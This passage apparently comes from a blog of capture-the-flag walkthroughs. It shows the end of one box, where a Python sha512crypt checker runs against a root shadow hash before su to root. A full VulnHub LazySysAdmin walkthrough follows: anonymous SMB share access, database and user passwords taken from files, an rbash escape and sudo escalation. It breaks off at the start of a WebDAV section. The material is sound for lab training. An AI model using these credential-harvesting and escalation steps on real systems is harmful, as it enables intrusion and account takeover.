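    if len(parts) < 4 or parts[1] != "6":
        raise ValueError("not a sha512crypt field: " + field)
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
        parts.pop(2)
    return rounds, parts[2], parts[3]


def check_shadow_password(shadow_line, candidate):
    """True if `candidate` is the password behind a /etc/shadow line."""
    field = shadow_line.split(":")[1]
    rounds, salt, expected = parse_shadow_hash(field)
    got = sha512_crypt(candidate, salt, rounds).split("$")[-1]
    return got == expected


# root's line exactly as tail printed it above
ROOT_LINE = ("root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3"
             "XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::")

if __name__ == "__main__":
    for guess in ("password", "john"):
        print(guess, check_shadow_password(ROOT_LINE, guess))
```

Every guess costs 5000 SHA-512 rounds, which is what makes sha512crypt slower to attack than a bare hash, but a password that sits at the top of rockyou falls regardless of the cost factor; John's 1798 p/s above was more than enough.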

www-data@1afdd1f6b82c:/home$ su root
su root
Password: john

root@1afdd1f6b82c:/home# id
id
uid=0(root) gid=0(root) groups=0(root)
root@1afdd1f6b82c:/home# whoami
whoami
root
root@1afdd1f6b82c:/home# 

Success! Now let's look for flags in the /root directory.

root@1afdd1f6b82c:/home# cd /root
cd /root
root@1afdd1f6b82c:~# ls -la
ls -la
total 36
drwx------ 1 root root 4096 Mar  1  2019 .
drwxr-xr-x 1 root root 4096 Feb 23  2019 ..
-rw------- 1 root root   57 Mar  1  2019 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 2 root root 4096 Feb 24  2019 .nano
-rw-rw-rw- 1 root root   28 Feb 28  2019 .port
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root  169 Feb  9  2019 .wget-hsts
-rw-r--r-- 1 root root   27 Feb 28  2019 flag
root@1afdd1f6b82c:~# cat flag
cat flag
Life consists of details..
root@1afdd1f6b82c:~# 

VulnHub: LazySysAdmin Walkthrough

We first start off with a nmap scan of the remote host.

root@ubuntu:~# nmap -Pn -sS -sV -sC -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-11 19:30 MDT
Nmap scan report for raven.local (192.168.56.101)
Host is up (0.00098s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.56.1
|_  error: Closing link: (nmap@192.168.56.1) [Client exited]
MAC Address: 08:00:27:1D:69:9D (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -6h00m01s, deviation: 0s, median: -6h00m01s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-10-12T05:30:43+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-11 13:30:43
|_  start_date: 1600-12-31 17:00:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.19 seconds
root@ubuntu:~# 

Here we have an HTTP server on the remote host, and a robots.txt exists; nmap lists its disallowed entries for us.

80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode

We ran dirb against the website and found two interesting paths:

http://192.168.56.101/info.php
http://192.168.56.101/phpmyadmin/

http://192.168.56.101/info.php is a phpinfo page and gives away a lot: the kernel version, the PHP version, and the PHP configuration (note allow_url_include is off and open_basedir is unset).

Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686

PHP/5.5.9-1ubuntu4.22

mysql 5.5.57

_SERVER["DOCUMENT_ROOT"] /var/www/html

allow_url_fopen 	On
allow_url_include	Off

open_basedir	no value

The site is running WordPress 4.8.1, for which searchsploit turns up nothing usable, so I moved on to brute forcing the WordPress admin login. wpscan confirms that the admin user exists:

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Brute forcing the admin login with wpscan didn't pan out, so I moved on to SMB enumeration.

SMB Enumeration

If we look at the results of the nmap scan we can see the remote host is serving up shares.

Host script results:
|_clock-skew: mean: -6h00m01s, deviation: 0s, median: -6h00m01s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2019-10-12T05:30:43+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-11 13:30:43
|_  start_date: 1600-12-31 17:00:04

We'll start off using smbclient to see what we can do.

root@ubuntu:~# smbclient -L //192.168.56.101 -N
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAZYSYSADMIN
root@ubuntu:~# 

Three shares are present, and share$ (comment "Sumshare") looks interesting. Let's try to connect to it with no password.

root@ubuntu:~# smbclient -N //192.168.56.101/share$
WARNING: The "syslog" option is deprecated 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 15 05:05:52 2017
  ..                                  D        0  Mon Aug 14 06:34:47 2017
  wordpress                           D        0  Tue Aug 15 05:21:08 2017
  Backnode_files                      D        0  Mon Aug 14 06:08:26 2017
  wp                                  D        0  Tue Aug 15 04:51:23 2017
  deets.txt                           N      139  Mon Aug 14 06:20:05 2017
  robots.txt                          N       92  Mon Aug 14 06:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 06:39:56 2017
  apache                              D        0  Mon Aug 14 06:35:19 2017
  index.html                          N    36072  Sat Aug  5 23:02:15 2017
  info.php                            N       20  Tue Aug 15 04:55:19 2017
  test                                D        0  Mon Aug 14 06:35:10 2017
  old                                 D        0  Mon Aug 14 06:35:13 2017

		3029776 blocks of size 1024. 1435904 blocks available
smb: \> 

We land at the smb prompt, so the share is accessible anonymously, and its contents look like the HTTP document root. deets.txt and todolist.txt look interesting, so we download both to our local box.

smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (8.0 KiloBytes/sec) (average 8.0 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (4.5 KiloBytes/sec) (average 6.3 KiloBytes/sec)
smb: \> 

deets.txt

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

todolist.txt

Prevent users from being able to view to web root using the local file browser

Another file worth grabbing is wp-config.php, which stores the database user and password in clear text.

smb: \> cd wordpress
smb: \wordpress\> get wp-config.php
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (190.3 KiloBytes/sec) (average 60.5 KiloBytes/sec)
smb: \wordpress\> 
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

Now that we have a database username and password we can go back to phpmyadmin, log in with them and run queries from there.

The login works. Next we look in the wp_users table for the blog logins.

It turns out this account does not have permission to run SELECT against the wordpress database, so that route is closed.

Going back over the clues we found earlier, deets.txt gave us a password (12345) for some account on the server. My first instinct was to try it over SSH, but we still need a username to go with it. The blog running on the server says:

"My name is togie". Perhaps togie is the SSH username, so we fire up ssh and check.
root@ubuntu:~# ssh togie@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################

togie@192.168.56.101's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0

133 packages can be updated.
0 updates are security updates.

togie@LazySysAdmin:~$

It worked. Now that we have shell access to the server, let's run a few commands and see what we can find.

togie@LazySysAdmin:~$ cd ..
-rbash: cd: restricted
togie@LazySysAdmin:~$ echo $SHELL
/bin/rbash
togie@LazySysAdmin:~$ 

We are in a restricted shell (rbash). It won't let us cd, change PATH or SHELL, use output redirection, or run any command whose name contains a '/'. What it does not stop is running another shell that is found on PATH, so 'bash -i' gives us an unrestricted bash, after which changing directories works.


togie@LazySysAdmin:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
togie@LazySysAdmin:~$ bash -i
togie@LazySysAdmin:~$ cd ..
togie@LazySysAdmin:/home$

Now that we have broken out of the restricted shell, it's time to check sudo and see what privileges, if any, the user togie has.

togie@LazySysAdmin:/home$ sudo -l
[sudo] password for togie: 
Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
togie@LazySysAdmin:~$ sudo -s
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~# 
togie may run any command as root, so sudo -s gives us a root shell and the box is done.

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...